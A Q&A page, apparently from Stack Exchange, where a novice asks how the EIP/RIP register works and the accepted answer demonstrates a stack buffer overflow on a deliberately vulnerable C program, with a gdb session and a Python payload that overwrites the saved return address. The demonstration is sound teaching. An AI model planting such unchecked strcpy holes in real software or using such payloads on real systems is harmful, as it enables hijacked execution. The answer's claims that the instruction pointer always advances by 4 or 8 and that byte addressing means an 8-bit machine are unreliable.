Understanding how EIP (RIP) register works?

Question

I'm a complete novice to computer architecture and the low level stuff that happens at the processor/memory level. I'll start by saying that. What i've done with computers has pretty much always been at the high level programming level. C++, Java, etc.

That being said, I'm currently reading a book that is starting to delve into the low level programming stuff, assembly, registers, pointers, etc. I'm having a hard time understanding how the EIP register works.

From what is said in the book, each memory address has one byte, and each byte has a memory address.

From what I'm reading about the EIP register, it points to the next set of instructions for the processor to do. While using debugging tools (GDB) to follow along in the book, if you were to examine memory at a particular location, say:

x/8xb it allegedly lets you examine the first 8 bytes at the memory address. But if each memory address has only 1 byte, I don't understand. Can someone help me understand this? I have looked for thorough explanations of how this register works and functions but I can't really find anything

This is a practical question about a concrete architecture, it's an engineering question, not a science question, so I'm migrating it to a site where it's on-topic. — Gilles 'SO- stop being evil'
It's showing the 8 bytes at sequentially increasing memory addresses from the one specified. — jcoder
They aren't all at that same address. You can easily see this if you make the address one or two higher and then show 8 bytes again. — harold
When they say "8 bytes at a particular address", what they mean is "8 bytes in the chunk of memory that starts at the address". Second, third bytes and so on would have greater addresses. — Seva Alekseyev

Niklas R. Niklas R. · Accepted Answer · 2019-11-04T19:52:59

The instruction pointer is normally a register (a memory) on the microprocessor which increments with 4 (4 bytes) for a 32-bit system and 8 (i.e. 8 bytes) for a 64-bit system so that it points to the next instrution.

When the program enters a function, a saved instruction pointer (ip/rip/eip) is the return address, which is the address where the function should jump back after termination.

From what is said in the book, each memory address has one byte, and each byte has a memory address.

That seems like an 8-bit computer then which is not our usual real situation. If we look at a certain program for example:

#include <stdio.h>
#include <string.h>

char * pwd = "pwd0";

void print_my_pwd() {
  printf("your pwd is: %s\n", pwd);
}

int check_pwd(char * uname, char * upwd) {
  char name[8];
  strcpy(name, uname);

  if (strcmp(pwd, upwd)) {
    printf("non authorized\n");
    return 1;
  }
  printf("authorized\n");
  return 0;
}

int main(int argc, char ** argv) {
  check_pwd(argv[1], argv[2]);
  return 0;
}

I can build it and examine it with gdb.

$ make
gcc -O0 -ggdb -o main main.c -fno-stack-protector
$ gdb main
GNU gdb (Ubuntu 8.2-0ubuntu1~18.04) 8.2
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from main...done.
(gdb) b check_pwd
Breakpoint 1 at 0x76c: file main.c, line 12.
(gdb) run joe f00b4r42
Starting program: /home/developer/main joe f00b4r42
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, check_pwd (uname=0x7fffffffdc01 "joe", upwd=0x7fffffffdc05 "f00b4r42") at main.c:12
12    strcpy(name, uname);
(gdb) info frame
Stack level 0, frame at 0x7fffffffd6d0:
 rip = 0x55555555476c in check_pwd (main.c:12); saved rip = 0x5555555547ef
 called by frame at 0x7fffffffd6f0
 source language c.
 Arglist at 0x7fffffffd6c0, args: uname=0x7fffffffdc01 "joe", upwd=0x7fffffffdc05 "f00b4r42"
 Locals at 0x7fffffffd6c0, Previous frame's sp is 0x7fffffffd6d0
 Saved registers:
  rbp at 0x7fffffffd6c0, rip at 0x7fffffffd6c8

You see above that the saved rip (the instruction pointer) is at 0x7fffffffd6c8 with the value 0x5555555547ef (important difference between where it is and what it is). I can purposely overflow the program to overwrite this value with something else which I know:

(gdb) p &name
$1 = (char (*)[8]) 0x7fffffffd6b8
(gdb) p &print_my_pwd
$2 = (void (*)()) 0x55555555473a <print_my_pwd>
(gdb) Quit

Now I know the distance between name and rip (not the values but their locations): 0x7fffffffd6c8 - 0x7fffffffd6b8 = 16. So I write 16 bytes into the location of name so that I will write into the value of rip and what I write is the location of print_my_pwd which is UUUUG: and backwards because it is little-endian computer:

$ ./main $(python -c "print 'AAAAAAAAAAAAAAAA:GUUUU'") B
non authorized
your pwd is: pwd0
Segmentation fault (core dumped)
$

As you see, the input caused an overflow and wrote over the value of the instruction pointer and caused the instruction pointer to jump to the location of the function which prints the password.

Don't write code like this in real life but hopefully it helps to understand how it works and doesn't work when you don't check the bounds of your input.

Understanding how EIP (RIP) register works?

1 Answers